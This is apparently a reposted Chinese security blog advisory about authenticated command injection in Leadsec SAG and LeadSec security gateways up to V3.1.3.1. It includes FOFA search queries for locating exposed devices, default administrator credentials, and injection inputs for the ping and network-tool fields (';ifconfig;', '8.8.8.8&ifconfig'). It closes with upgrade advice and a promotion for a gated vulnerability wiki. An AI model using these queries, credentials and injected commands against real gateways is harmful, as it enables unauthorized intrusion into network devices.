网御星云-安全网关SAG系列和LeadSec系列后台命令执行漏洞

  • A+
所属分类:安全文章

描述


网御星云安全网关有两个系列,SAG系列和Power V-VPN系列,SAG系列是比较老的一款产品,于2016年9月正式退市,但现网还存在不少未替换的SAG系列,该系列V3.1.3.1及以前版本存在后台命令执行漏洞。







影响范围



网御星云安全网关SAG系列和LeadSec系列<=V3.1.3.1版本







防护建议


及时进行换新安全网关防护,旧版本及时下架。







LeadSec系列漏洞:

FOFA:

icon_hash="-948153991"

利用弱口令(yyds):

账号:administrator   密码:administrator

漏洞点位于:

网关管理->网络工具,在目的主机处填写:

;ifconfig;

网御星云-安全网关SAG系列和LeadSec系列后台命令执行漏洞

网御星云-安全网关SAG系列和LeadSec系列后台命令执行漏洞


网御星云安全网关系列:

FOFA:

title="网御 安全网关"

利用弱口令(yyds):

账号:administrator   密码:[email protected]

漏洞点位于:

状态监控->网络测试->ping处输入:

8.8.8.8&ifconfig

网御星云-安全网关SAG系列和LeadSec系列后台命令执行漏洞

老旧的退役设备请及时替换,不要给黑客留下机会。


最后再说一下漏洞文库wiki.xypbk.com已经添加授权访问

获取授权方式为后台回复:文库授权


    为防止黑产份子的非法利用漏洞,不给国家安全添麻烦,本站从此开启授权访问,形式以每人单独授权发放,限量1000人,请勿分享您获取的账号密码,账号密码具都采用随机生成的32位MD5,还请牢记。

    

    如若因漏洞利用产生重大影响,会根据登录IP、请求内容、申请授权等信息进行查证,查证后将对号主进行追责,故不要分享账号,终害己身。


    虽然比较麻烦了些,但会稍微对黑产份子有一些限制,保证了本站安全,也保证国家安全。同时有些敏感东西也能第一时间放出来了,还请大家谅解。


    同时本站承诺永远不会出现买卖账号等利益相关的事情,本站永不割韭菜,永久免费检索,坚决抵制安全圈的歪风邪气。


    最后,若大家对此有意见请后台留言,本站将及时改正,若内容有侵犯您的权益,请及时提出,进行删除处理。

    

    本站能坚持多久全看大家是否滥用,内容若更新较慢也请谅解,本人有工作有生活,会尽量坚持更新的。



网御星云-安全网关SAG系列和LeadSec系列后台命令执行漏洞

扫取二维码获取

更多精彩

网御星云-安全网关SAG系列和LeadSec系列后台命令执行漏洞

Qingy之安全

网御星云-安全网关SAG系列和LeadSec系列后台命令执行漏洞




网御星云-安全网关SAG系列和LeadSec系列后台命令执行漏洞

点个在看你最好看


本文始发于微信公众号(Qingy之安全):网御星云-安全网关SAG系列和LeadSec系列后台命令执行漏洞

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: